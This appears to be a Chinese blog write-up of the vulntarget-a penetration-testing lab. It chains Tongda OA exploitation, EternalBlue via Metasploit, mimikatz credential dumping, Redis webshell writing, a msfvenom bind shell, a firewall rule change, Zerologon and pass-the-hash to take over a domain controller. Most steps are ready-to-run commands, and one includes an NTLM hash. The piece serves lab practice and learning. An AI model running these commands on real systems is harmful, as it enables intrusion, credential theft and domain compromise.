内网渗透--vulntarget-a

这篇具有很好参考价值的文章主要介绍了内网渗透--vulntarget-a。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境配置

靶机链接:https://pan.baidu.com/s/11uNcZP9PFt6FAKtuCO2WpA?pwd=346n

提取码:346n

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:VMware Win7 IP自动获取 网卡host-Only,其他两台网络不需要设置

web渗透

1.探测目标靶机开放端口和服务情况

nmap -A -sV 192.168.255.128

内网渗透--vulntarget-a

2.探测80端口常见漏洞

nmap --script=vuln -p 80 192.168.255.128

内网渗透--vulntarget-a

3.访问网页是一个通达OA

内网渗透--vulntarget-a

4.正常步骤扫目录

dirsearch -u 192.168.255.128 --exclude-status 400,401,403,404,405,501,503

内网渗透--vulntarget-a

5.访问敏感目录,一无所获。

内网渗透--vulntarget-a

6.尝试用通达OA漏洞检测工具进行漏洞探测

内网渗透--vulntarget-a

7.成功利用漏洞,成功连接蚁剑。

内网渗透--vulntarget-a

内网主机渗透

1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。

msfconsole

search ms17-010

use auxiliary/scanner/smb/smb_ms17_010

show options

set RHOSTS 192.168.255.128

run

内网渗透--vulntarget-a

2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。

use exploit/windows/smb/ms17_010_eternalblue

show options

set rhosts 192.168.255.128

set lhost 192.168.255.131

run

内网渗透--vulntarget-a

3.成功拿到shell,并且是管理员权限

进行信息收集

ipconfig

内网渗透--vulntarget-a

4.5如果有类似这种乱码执行chcp 65001 命令即可。

内网渗透--vulntarget-a

5.load kiwi 加载mimikatz

creds_all 获取主机密码

内网渗透--vulntarget-a

横向渗透

1.迁移进程

刚获得shell时,该shell是极其脆弱和容易受到攻击的。所以第一步就是要移动这个shell,把它和目标机中的一个稳定的进程绑定在一块;自动迁移进程命令 run post/windows/manage/migrate 系统会自动寻找合适的进程然后迁移

内网渗透--vulntarget-a

2.添加路由

添加路由为了向10.0.20.0网段进行渗透

run post/multi/manage/autoroute

run autoroute -p

添加代理

use auxiliary/server/socks_proxy

set srvport 9191

run

内网渗透--vulntarget-a

vi /etc/proxychains.conf

内网渗透--vulntarget-a

3.发现存活主机

1.进行对存活主机进行探测

use post/windows/gather/arp_scanner

set session 1

set rhosts 10.0.20.1-254

run

内网渗透--vulntarget-a

2.扫描开放端口

proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080

内网渗透--vulntarget-a

3.访问80端口

proxychains curl http://10.0.20.99

内网渗透--vulntarget-a

4.没有可利用的信息,对80端口做目录扫描

proxychains dirsearch -u http://10.0.20.99 --proxy=socks5://127.0.0.1:9191

发现phpinfo.php,访问看看proxychains firefox

内网渗透--vulntarget-a

4.Redis未授权访问

1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。

自行安装redis-cli进行漏洞探测

2.成功连接到redis服务,访问成功,不需要密码

proxychains redis-cli -h 10.0.20.99

内网渗透--vulntarget-a

3.Redis写入webshell

config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录

内网渗透--vulntarget-a

4.写入一句话木马,写入成功

内网渗透--vulntarget-a

5.用蚁剑连接,需要挂代理

内网渗透--vulntarget-a

6.成功连接到,并且还是管理员权限

内网渗透--vulntarget-a

6.打开虚拟终端,查看系统信息

ipconfig

内网渗透--vulntarget-a

渗透域控

1.用msfwenom本地生成一个正向的木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe > shell.exe

内网渗透--vulntarget-a

2.开启监听模块后,迟迟没有上线,可能开了防火墙

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 3333

set RHOST 10.0.20.99

run

3.在蚁剑添加防火墙入站规则

netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=3333 action=allow

内网渗透--vulntarget-a

内网渗透--vulntarget-a

4.重新运行,成功拿到shell

内网渗透--vulntarget-a

5.查找域控(10.0.10.110),添加路由

run post/windows/gather/enum_domain

run post/multi/manage/autoroute

内网渗透--vulntarget-a

6.扫描开放端口

proxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139

内网渗透--vulntarget-a

7.下载impacket包,利用里面的工具

git clone GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

内网渗透--vulntarget-a

8.下载cve-2020-1472

git clone GitHub - dirkjanm/CVE-2020-1472: PoC for Zerologon - all research credits go to Tom Tervoort of Secura

内网渗透--vulntarget-a

9.下载并执行攻击脚本对域控机器密码替换为空

python3 -m pip install -r requirements.txt

proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

分开执行

内网渗透--vulntarget-a

10.用secretsdump.py进行获取域管理员hash

proxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -no-pass

内网渗透--vulntarget-a

11.拿到管理员hash,执行提权exp,成功拿下域控!!!

proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 Administrator@10.0.10.110

内网渗透--vulntarget-a文章来源地址https://www.toymoban.com/news/detail-402289.html

到了这里,关于内网渗透--vulntarget-a的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(36)
  • 内网渗透—域环境之信息收集

      渗透测试的本质就是信息收集,不管是web还是在内网中,信息收集的全面性会直接影响后续的渗透测试工作,通常web端使用文件上传等进入内网后,就需要判断当前的网络环境和权限,为后续的横向移动等工作做好铺垫。   域英文叫DOMAIN——域(Domain)是Windows网络中独立

    2024年02月06日
    浏览(42)
  • 构建完善的安全渗透测试环境:推荐工具、资源和下载链接

    1、攻击机kali: kali官网 渗透测试工具Kali Linux安装与使用 kali汉化  虚拟机网络建议设置成NAT模式,桥接有时不稳定。 2、靶机OWASP_Broken_Web_Apps: 迅雷下载 网盘下载 安装教程 开机之后需要登录,默认的账号/密码:root       owaspbwa 在浏览器中打开获取到的ip要根据自己的情

    2024年02月07日
    浏览(62)
  • 内网渗透(八十四)之ADCS配置启用基于SSL的LDAP(LDAPS)

    打开AD CS,选择证书颁发机构 选择证书模板,右键管理 选择Kerberos身份验证,右键 复制模板 然后会有一个Kerberos身份验证的副本,右键更改名称,更改为LDAPS 选择LDAPS,右键属性 设置模板属性,请求处理——允许导出私钥(O) 创建证书模板

    2024年02月15日
    浏览(29)
  • PWNlab靶机渗透

    安装靶机 下载地址:https://www/vulnhub.com/entry/pwnlab-init,158/ 收集靶机ip地址,由于搭建在本地使用kali自带命令 arp-scan -l nmap 扫描端口,服务 nmap -sV -p 1-65535 -A 靶机ip地址   访问80端口地址,查找可利用的功能点 发现存在upload,不过需要登录 发现一个规律每次切换网页时,存在p

    2024年02月13日
    浏览(30)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(43)
  • 靶机渗透(五)——metasploitable2

    metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 : msfadmin 密码是: msfadmin 开放了好多端口 大致过程 在kali中执行msfconsole,启动metasploit search irc,选择模块

    2024年02月05日
    浏览(54)
  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(86)
  • DarkHole_1靶机渗透流程

    注意:部署时,靶机的网络连接模式必须和kali一致,让靶机跟kali处于同一网段,这用kali才能扫出靶机的主机 1.1 探测IP 使用nmap扫描同一个段下存活的IP 发现192.168.157.138开放了80端口,访问后确认为此次渗透的靶机 1.2 详细信息扫描 -A:启用操作系统探测与版本检测、脚本扫描

    2024年02月06日
    浏览(40)
  • DC-1靶机渗透(教程以及思路)

    一:信息搜集 首先第一步就是使用fping来查看靶机的ip 使用命令fping -aqg ip 使用nmap -sS -p-进行扫描 发现开启了4个端口,分别是22,80,111,45186 再使用nmap的-sV扫描详细信息进行扫描,查看版本号判断是否存在漏洞 二:思路 一般来说这样的端口,我会先从80端口开始,看是否存

    2023年04月08日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包